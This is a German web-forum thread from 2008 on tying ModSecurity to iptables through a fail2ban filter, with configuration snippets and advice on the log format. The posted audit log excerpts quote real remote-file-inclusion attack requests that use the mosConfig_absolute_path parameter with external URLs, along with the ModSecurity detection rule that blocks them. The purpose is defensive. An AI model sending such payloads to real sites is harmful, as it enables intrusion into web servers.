Current time: 11-16-2024, 08:28 AM Hello There, Guest! (LoginRegister)


Thread Closed 
 
Thread Rating:
  • 0 Votes - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
[Erledigt] iptables apache anbindung
Author Message
fulltilt Offline
Member
***

Posts: 1,225
Joined: Apr 2007
Reputation: 5
Post: #1
[Erledigt] iptables apache anbindung
Kennt jemand eine Möglichkeit um mod_security an iptables anzubinden?
Also wenn z.b. eine regex aus einer der confs passt das dann direkt geblockt wird. Modsecurity schickt zwar die Fehlerseite aber wenn jemand Rootkits installieren will, kostet das ganze sehr viel Leistung.
(This post was last modified: 03-02-2008 10:03 PM by fulltilt.)
02-21-2008 08:54 PM
Find all posts by this user
BeNe Offline
Moderator
*****
Moderators

Posts: 5,899
Joined: Jan 2007
Reputation: 68
Post: #2
RE: iptables apache anbindung
Quote:Also wenn z.b. eine regex aus einer der confs passt das dann direkt geblockt wird
Wäre eigentlich das Thema von FAIL2BAN. Das hast Du ja auch schon im Einsatz.

Greez BeNe
02-21-2008 09:01 PM
Visit this user's website Find all posts by this user
fulltilt Offline
Member
***

Posts: 1,225
Joined: Apr 2007
Reputation: 5
Post: #3
RE: iptables apache anbindung
Hi BeNe,

müsste auch über fail2ban klappen ... aber kann man die regex nicht so umschreiben das statt 403 - iptables blockt?

Also solche Logs direkt blockieren ohne erst ne Fehlermeldung:
Code:
GET /?mosConfig_absolute_path=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: www.xxxxxxxxxx.tld
User-Agent: libwww-perl/5.808

--ba07427a-H--
Message: Access denied with code 403 (phase 2). Pattern match "(\\.\\./\\.\\.|/|(http|https|ftp)\\:/)" at ARGS:mosConfig_absolute_path. [id "390075"] [rev "1"] [msg "JITP: Generic mosConfig_absolute_path File Inclusion Vulnerability"] [severity "CRITICAL"]
Action: Intercepted (phase 2)
Producer: ModSecurity v2.1.1 (Apache 2.x)
02-21-2008 09:15 PM
Find all posts by this user
fulltilt Offline
Member
***

Posts: 1,225
Joined: Apr 2007
Reputation: 5
Post: #4
RE: iptables apache anbindung
Ich hab es mal so probiert:

In filter.d angelegt: apache-modsec.conf
Code:
[Definition]
# Option:  failregex
# Notes.:  regex to match the password failure messages in the logfile. The
#          host must be matched by a group named "host". The tag "<HOST>" can
#          be used for standard IP/hostname matching.
# Values:  TEX
#
failregex = [[]client <HOST>[]] Message: Access denied with code 403
# Option:  ignoreregex
# Notes.:  regex to ignore. If this regex matches, the line is ignored.
# Values:  TEXT
#
ignoreregex =

in jail.conf:
Code:
[apache-modsec]
enabled = true
port    = http
filter  = apache-modsec
logpath = /var/log/apache*/mod-security2.log
maxretry = 1

Ich nutze modsecurity2 welches nach /var/log/apache*/mod-security2.log loggt.

Ist das oben soweit richtig zu diesem Log bzw. funktioniert das so?
Die IP des Angreifers steht in der ersten Zeile und dahinter gleich die meines Servers.
Die Logeinträge sehen so aus:
Code:
--e97c4236-A--
[21/Feb/2008:10:30:30 +0100] wbi3aMMYTXsAAGuGDoQAAAAX xx.117.225.155 33139 xxx.xx.xx.xxx 80
--e97c4236-B--
GET /content/view/20/38//?mosConfig_absolute_path=http://onlypets.net/id.txt?? HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: www.tld.tld
User-Agent: libwww-perl/5.808

--e97c4236-F--
HTTP/1.1 403 Forbidden
Last-Modified:
ETag: "119xxxxxxxxxxx56540"
Accept-Ranges: bytes
Content-Length: 1136
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=ISO-8859-1

--e97c4236-H--
Message: Access denied with code 403 (phase 2). Pattern match "(\\.\\./\\.\\.|/|(http|https|ftp)\\:/)" at ARGS:mosConfig_absolute_path. [id "390075"] [rev "1"] [msg "JITP: Generic mosConfig_absolute_path File Inclusion Vulnerability"] [severity "CRITICAL"]
Action: Intercepted (phase 2)

--e97c4236-Z--
(This post was last modified: 02-21-2008 09:59 PM by fulltilt.)
02-21-2008 09:49 PM
Find all posts by this user
BeNe Offline
Moderator
*****
Moderators

Posts: 5,899
Joined: Jan 2007
Reputation: 68
Post: #5
RE: iptables apache anbindung
Ja, das könnte so funktionieren. Lass es einfach mal so laufen und schaue in dann in die Log von Fail2ban. Sonst müssen wir das regex anpassen.

Greez BeNe
02-21-2008 10:13 PM
Visit this user's website Find all posts by this user
fulltilt Offline
Member
***

Posts: 1,225
Joined: Apr 2007
Reputation: 5
Post: #6
RE: iptables apache anbindung
Danke BeNe,

poste ich hier später ...
Sonst habe ich relativ viele solcher Angriffe ... momentan ist alles ruhig :-)

BeNe Wrote:Ja, das könnte so funktionieren. Lass es einfach mal so laufen und schaue in dann in die Log von Fail2ban. Sonst müssen wir das regex anpassen.

Greez BeNe
02-21-2008 10:25 PM
Find all posts by this user
fulltilt Offline
Member
***

Posts: 1,225
Joined: Apr 2007
Reputation: 5
Post: #7
RE: iptables apache anbindung
Hm - klappt leider noch nicht so ...
Ich denke es ist wg. der Logeinträge von modseurity2.

Die IP des Angreifers müsste wohl direkt vorne stehen mit dem Teil der regex.

Kann das Logformat so angepasst werden?

Code:
# Logfile
SecAuditEngine RelevantOnly
SecAuditLogRelevantStatus "^[45]"
SecAuditLogType Serial
SecAuditLog /var/log/apache2/mod-security2.log
SecAuditLogParts "ABIFHZ"
(This post was last modified: 02-22-2008 06:57 PM by fulltilt.)
02-22-2008 06:45 PM
Find all posts by this user
BeNe Offline
Moderator
*****
Moderators

Posts: 5,899
Joined: Jan 2007
Reputation: 68
Post: #8
RE: iptables apache anbindung
Ich habe leider auf keinem Server Mod_Security laufen daher kann ich Dir hier nicht mehr groß weiterhelfen Sad
Aber vielleicht findet sich ja was in anderen Foren zu dem Thema.

Greez BeNe
02-22-2008 10:43 PM
Visit this user's website Find all posts by this user
fulltilt Offline
Member
***

Posts: 1,225
Joined: Apr 2007
Reputation: 5
Post: #9
RE: iptables apache anbindung
Danke BeNe,

ich teste mal alles durch mit den Log Formats ...

BeNe Wrote:Ich habe leider auf keinem Server Mod_Security laufen daher kann ich Dir hier nicht mehr groß weiterhelfen Sad
Aber vielleicht findet sich ja was in anderen Foren zu dem Thema.

Greez BeNe
02-22-2008 10:49 PM
Find all posts by this user
Rene Offline
Member
*
Beta Team

Posts: 342
Joined: Sep 2007
Reputation: 4
Post: #10
RE: iptables apache anbindung
Hallo,

Quote:Die IP des Angreifers müsste wohl direkt vorne stehen mit dem Teil der regex

Quote:
Code:
failregex = [[]client <HOST>[]] Message: Access denied with code 403

also wenn du das so formulierst, dann ja Wink

du solltest es schon anpassen und nicht einfach aus anderen Regeln kopieren ohne zu wissen was es bedeutet.

wenn im log ein Zweizeiler ist, hast du pech. die IP muss in der selben Zeile stehen wie die Fehlermeldung.

Edit:
Die Zeile musst du nutzen:

Quote:
Code:
[21/Feb/2008:10:30:30 +0100] wbi3aMMYTXsAAGuGDoQAAAAX xx.117.225.155 33139 xxx.xx.xx.xxx 80
(This post was last modified: 02-24-2008 01:02 AM by Rene.)
02-24-2008 12:32 AM
Find all posts by this user
Thread Closed 


Forum Jump:


User(s) browsing this thread: 2 Guest(s)